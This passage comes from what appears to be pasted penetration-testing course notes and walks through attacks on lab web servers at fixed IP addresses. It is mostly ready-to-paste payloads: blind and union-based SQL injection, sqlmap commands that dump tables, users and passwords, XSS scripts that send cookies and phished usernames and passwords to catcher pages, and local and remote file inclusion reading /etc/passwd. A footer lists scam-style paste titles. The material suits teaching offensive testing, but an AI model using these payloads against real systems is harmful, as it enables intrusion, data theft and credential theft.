2716		http://45.77.162.239/bookdetail.aspx?id=2 &0#
2717		-------------------------------------------------------------------------------------
2718
2719		-- Now that we've seen the differences in the webpage with True/False SQL Injection - let's see what we can learn using it
2720		---------------------------Paste this into Firefox-----------------------------------
2721		http://45.77.162.239/bookdetail.aspx?id=2 and 1=1--
2722		http://45.77.162.239/bookdetail.aspx?id=2 and 1=2--
2723		http://45.77.162.239/bookdetail.aspx?id=2 and user='joe' and 1=1--
2724		http://45.77.162.239/bookdetail.aspx?id=2 and user='dbo' and 1=1--
2725		---------------------------------------------------------------------------------------
2726
2727
2728		###############################
2729		# Blind SQL Injection Testing #
2730		###############################
2731		Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
2732
2733		3 - Total Characters
2734		---------------------------Paste these one line at a time into Firefox-----------------------------------
2735		http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
2736		http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
2737		http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
2738		---------------------------------------------------------------------------------------------------------
2739
2740		Let's go for a quick check to see if it's DBO
2741		---------------------------Paste this into Firefox-----------------------------------
2742		http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
2743		-------------------------------------------------------------------------------------
2744		Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
2745
2746		D - 1st Character
2747		---------------------------Paste these one line at a time into Firefox-----------------------------------
2748		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
2749		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
2750		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
2751		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
2752		---------------------------------------------------------------------------------------------------------
2753
2754		B - 2nd Character
2755		---------------------------Paste these one line at a time into Firefox-----------------------------------
2756		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2757		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2758		---------------------------------------------------------------------------------------------------------
2759
2760		O - 3rd Character
2761		---------------------------Paste these one line at a time into Firefox-----------------------------------
2762		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2763		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
2764		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2765		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2766		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
2767		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
2768		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2769		---------------------------------------------------------------------------------------------------------
2770
2771
2772
2773
2774		##########
2775		# Sqlmap #
2776		##########
2777		If you want to see how we automate all of the SQL Injection attacks you can log into your StrategicSec-Ubuntu-VM and run the following commands:
2778		---------------------------Type This-----------------------------------
2779		cd /home/strategicsec/toolz/sqlmap-dev/
2780		python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -b
2781		python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-user
2782		python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-db
2783		python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --dbs
2784		python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp --tables
2785		python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns
2786		python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns
2787		python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns --dump
2788		python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns --dump
2789		python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --users --passwords
2790		------------------------------------------------------------------------
2791
2792
2793
2794		#######################
2795		# Attacking PHP/MySQL #
2796		#######################
2797
2798		Go to LAMP Target homepage
2799		---------------------------Paste this into Firefox-----------------------------------
2800		http://45.63.104.73/
2801		-------------------------------------------------------------------------------------
2802
2803
2804		Clicking on the Acer Link:
2805		---------------------------Paste this into Firefox-----------------------------------
2806		http://45.63.104.73/acre2.php?lap=acer
2807		-------------------------------------------------------------------------------------
2808
2809		- Found parameter passing (answer yes to question 1)
2810		- Insert ' to test for SQLI
2811
2812		---------------------------Paste this into Firefox-----------------------------------
2813		http://45.63.104.73/acre2.php?lap=acer'
2814		-------------------------------------------------------------------------------------
2815
2816		Page returns the following error:
2817		You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
2818
2819
2820
2821		In order to perform union-based sql injection - we must first determine the number of columns in this query.
2822		We do this using the ORDER BY
2823		---------------------------Paste this into Firefox-----------------------------------
2824		http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
2825		-------------------------------------------------------------------------------------
2826
2827
2828		Page returns the following error:
2829		Unknown column '100' in 'order clause'
2830
2831
2832		---------------------------Paste this into Firefox-----------------------------------
2833		http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
2834		-------------------------------------------------------------------------------------
2835
2836
2837		Page returns the following error:
2838		Unknown column '50' in 'order clause'
2839
2840
2841		---------------------------Paste this into Firefox-----------------------------------
2842		http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
2843		-------------------------------------------------------------------------------------
2844
2845		Page returns the following error:
2846		Unknown column '25' in 'order clause'
2847
2848
2849		---------------------------Paste this into Firefox-----------------------------------
2850		http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
2851		-------------------------------------------------------------------------------------
2852
2853		Page returns the following error:
2854		Unknown column '12' in 'order clause'
2855
2856
2857		---------------------------Paste this into Firefox-----------------------------------
2858		http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
2859		-------------------------------------------------------------------------------------
2860		---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
2861
2862
2863
2864		Now we build out the union all select statement with the correct number of columns
2865
2866		Reference:
2867		http://www.techonthenet.com/sql/union.php
2868
2869
2870		---------------------------Paste this into Firefox-----------------------------------
2871		http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
2872		-------------------------------------------------------------------------------------
2873
2874
2875
2876		Now we negate the parameter value 'acer' by turning into the word 'null':
2877
2878		http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
2879		-------------------------------------------------------------------------------------
2880
2881		We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
2882
2883
2884		Use a cheat sheet for syntax:
2885		http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
2886
2887		---------------------------Paste these one line at a time into Firefox-----------------------------------
2888		http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
2889
2890		http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
2891
2892		http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
2893
2894		http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
2895
2896		http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
2897		------------------------------------------------------------------------------------- -------------------
2898
2899
2900
2901
2902		Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
2903
2904		Here is a good reference for it:
2905		https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
2906
2907		Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
2908
2909
2910		###############################################################################
2911		# What is XSS #
2912		# https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx #
2913		###############################################################################
2914
2915		OK - what is Cross Site Scripting (XSS)
2916
2917		1. Use Firefox to browse to the following location:
2918		---------------------------Paste this into Firefox-----------------------------------
2919		http://45.63.104.73/xss_practice/
2920		-------------------------------------------------------------------------------------
2921
2922		A really simple search page that is vulnerable should come up.
2923
2924
2925
2926
2927		2. In the search box type:
2928		---------------------------Paste this into Firefox-----------------------------------
2929		<script>alert('So this is XSS')</script>
2930		-------------------------------------------------------------------------------------
2931
2932
2933		This should pop-up an alert window with your message in it proving XSS is in fact possible.
2934		Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
2935
2936
2937		3. In the search box type:
2938		---------------------------Paste this into Firefox-----------------------------------
2939		<script>alert(document.cookie)</script>
2940		-------------------------------------------------------------------------------------
2941
2942
2943		This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
2944		Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
2945
2946		4. Now replace that alert script with:
2947		---------------------------Paste this into Firefox-----------------------------------
2948		<script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
2949		-------------------------------------------------------------------------------------
2950
2951		This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
2952
2953
2954		5. Now view the stolen cookie at:
2955		---------------------------Paste this into Firefox-----------------------------------
2956		http://45.63.104.73/xss_practice/cookie_stealer_logs.html
2957		-------------------------------------------------------------------------------------
2958
2959		The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
2960
2961
2962
2963
2964
2965
2966		############################
2967		# A Better Way To Demo XSS #
2968		############################
2969
2970
2971		Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
2972
2973
2974		Use Firefox to browse to the following location:
2975		---------------------------Paste this into Firefox-----------------------------------
2976		http://45.63.104.73/xss_practice/
2977		-------------------------------------------------------------------------------------
2978
2979
2980		Paste this in the search box
2981		----------------------------
2982
2983
2984		Option 1
2985		--------
2986		---------------------------Paste this into Firefox-----------------------------------
2987		<script>
2988		password=prompt('Your session is expired. Please enter your password to continue',' ');
2989		document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
2990		</script>
2991		-------------------------------------------------------------------------------------
2992
2993		Now view the stolen cookie at:
2994		---------------------------Paste this into Firefox-----------------------------------
2995		http://45.63.104.73/xss_practice/passwords.html
2996		-------------------------------------------------------------------------------------
2997
2998
2999		Option 2
3000		--------
3001		-------------------------Paste this into Firefox-----------------------------------
3002		<script>
3003		username=prompt('Please enter your username',' ');
3004		password=prompt('Please enter your password',' ');
3005		document.write("<img src=\"http://45.63.104.73/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
3006		</script>
3007		-------------------------------------------------------------------------------------
3008
3009
3010
3011		Now view the stolen cookie at:
3012		http://45.63.104.73/xss_practice/username_password_logs.html
3013
3014
3015
3016
3017		#########################################
3018		# Let's try a local file include (LFI) #
3019		#########################################
3020		- Here is an example of an LFI
3021		- Open this page in Firefox:
3022		-------------------------Paste this into Firefox-----------------------------------
3023		http://45.63.104.73/showfile.php?filename=contactus.txt
3024		-------------------------------------------------------------------------------------
3025
3026
3027		- Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
3028		- Here you see a direct reference to a file on the local filesystem of the victim machine.
3029		- You can attack this by doing the following:
3030		-------------------------Paste this into Firefox-----------------------------------
3031		http://45.63.104.73/showfile.php?filename=/etc/passwd
3032		-------------------------------------------------------------------------------------
3033
3034
3035		- This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
3036		- somewhere else on the Internet. Here is an example of a text file on the web:
3037		-------------------------Paste this into Firefox-----------------------------------
3038		http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
3039		-------------------------------------------------------------------------------------
3040
3041		- Now we can attack the target via RFI like this:
3042		-------------------------Paste this into Firefox-----------------------------------
3043		http://45.63.104.73/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
3044		-------------------------------------------------------------------------------------
3045
3046
3047
3048		###############################
3049		# How much fuzzing is enough? #
3050		###############################
3051		There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
3052
3053		Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
3054
3055
3056		Step 1: Ask yourself the 3 questions per page of the site.
3057
3058		Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
3059
3060		Step 3: When you load your fuzz strings - use the following decision tree
3061
3062		- Are the fuzz strings causing a default error message (example 404)?
3063		- If this is the case then it is most likely NOT vulnerable
3064
3065		- Are the fuzz strings causing a WAF or LB custom error message?
3066		- If this is the case then you need to find an encoding method to bypass
3067
3068
3069		- Are the fuzz strings causing an error message that discloses the backend type?
3070		- If yes, then identify DB type and find correct syntax to successfully exploit
3071		- Some example strings that I use are:
3072		'
3073		"
3074		() <----- Take the parameter value and put it in parenthesis
3075		(5-1) <----- See if you can perform an arithmetic function
3076
3077
3078		- Are the fuzz strings rendering executable code?
3079		- If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
3080		- Some example strings that I use are:
3081		<b>hello</b>
3082		<u>hello</u>
3083		<script>alert(123);</script>
3084		<script>alert(xss);</script>
3085		<script>alert('xss');</script>
3086		<script>alert("xss");</script>

Public Pastes

⭐️ EARN $500 INSTANTLY⭐ NB
JavaScript | 49 sec ago | 0.17 KB
⭐ FREE giftcards method⭐ TO
JavaScript | 1 min ago | 0.17 KB
Terrible python code all numbers divisibility...
Python | 2 min ago | 4.94 KB
⭐ FREE giftcards method ON
JavaScript | 9 min ago | 0.17 KB
⭐ Binance Account hack 3B
JavaScript | 10 min ago | 0.17 KB
⭐ Binance Account hack QK
JavaScript | 17 min ago | 0.17 KB
⭐ get any gift card for FREE⭐ 2I
JavaScript | 18 min ago | 0.17 KB
⭐ get any gift card for AF
JavaScript | 26 min ago | 0.17 KB